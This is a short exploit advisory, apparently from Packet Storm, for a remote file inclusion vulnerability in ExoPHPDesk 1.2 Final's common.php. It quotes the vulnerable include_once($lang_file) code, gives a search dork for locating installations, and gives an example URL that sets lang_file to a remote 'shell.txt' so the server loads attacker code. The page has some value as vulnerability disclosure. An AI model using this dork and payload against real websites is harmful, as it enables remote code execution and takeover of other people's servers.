ExoPHPDesk version 1.2 Final suffers from a remote file inclusion vulnerability in common.php.
147792f2d1c6b1677502b505673abfb31dfc28c06f483ef59e78d8e3aea6ba5c*******************************************************************************
# Title : ExoPHPDesk 1.2 Final
# Author : e.wiZz!
# Info : Bosnian Idiot !
# Script Page : http://www.exocrew.com
# Dork : Powered by ExoPHPDesk v1.2 Final.
*******************************************************************************
[[RFI]]]---------------------------------------------------------
common.php
Line 40~ (dunno..i have normal notepad :D)
-------------cut here---------------------
define("ACT", $_REQUEST['action']);
define("TYPE", $_REQUEST['type']);
define("SUBM", $_POST['submit']);
define("FNAME", $_GET['fn']);
// Include Language File
include_once($lang_file);
----------cut here-------------------
Example:
http://www.inthewild.com/`path`/common.php?lang_file=http://shell.txt?
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed